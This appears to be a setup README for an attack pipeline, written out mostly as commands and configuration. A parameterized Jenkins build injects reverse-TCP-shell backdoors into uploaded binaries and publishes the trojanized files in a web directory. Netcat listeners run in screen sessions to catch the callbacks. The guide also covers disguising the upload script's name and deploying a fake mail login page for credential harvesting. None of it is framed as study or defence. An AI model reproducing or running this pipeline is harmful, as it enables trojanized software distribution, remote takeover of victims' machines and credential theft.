You need a running Jenkins server. On it, create a build; this build needs to be parameterized with the following text parameters (listed under Jenkins configuration).
Usage: python $BINARY $PLACE TO UPLOAD / DOWNLOAD $PUT SCRIPT LOCATION $JENKINS URL $Jenkins token $Jenkins project location $0 for linux $not used yet, always 0 $Backdoor callback port $backdoor callback ip / domain name
## Jenkins configuration:
Standard Jenkins build. It is easiest to change the Jenkins user to be the same as the www root user if on the same server (on Ubuntu it is www-data, guide: ). You need to edit the following in Jenkins:
- Make it a parameterized build with the following:
  - dir
  - Payload_Type
  - port (Note: For shell call back)
  - IP (Note: For shell call back)
  - binName
- Check allow simultaneous builds
- Set it to allow being remotely triggered with a token
- Add zombie qr to the screenrc file (for me www-data was using /etc/screenrc)
- Build shell with the following:

```sh
rp=$(expr 1024 + $BUILD_NUMBER) #make it a port that is non-reserved and non-taken, should exclude 8080 and a few others
echo $rp
cp /in/$dir .
backdoor -f $dir -P $rp -H $IP -s reverse_shell_tcp
cp backdoored/$dir /var/www/html/out/$dir
echo "\n------------\nIP:$cip\nPort:$rp\nBinary:$binName" >> /var/www/html/list_screens_go_to_what
## NEED SCREEN AND netcat-openbsd packages (sudo apt-get install netcat-openbsd) as default nc does not have the -k flag
screen -S L_$rp -dm "nc -lnvkp $rp"
```
## PHP Configuration:
I use apache2 with PHP5
sudo apt-get install apache2 libapache2-mod-php5 php5-cgi
Move put.php into /var/www/html/ and change the name to something that would not be suspicious.
If you want, there is a basic template for making it look like a mail login, with cred harvesting; move everything in mail/ to /var/www/html.
edit /etc/apache2/sites-enabled/000-default.conf
and add DirectoryIndex index.php
to index.php
## To get shell back:
nc -lnvp $Backdoor Port #wait for shell
For help email [email protected]
-- Robert Hartshorn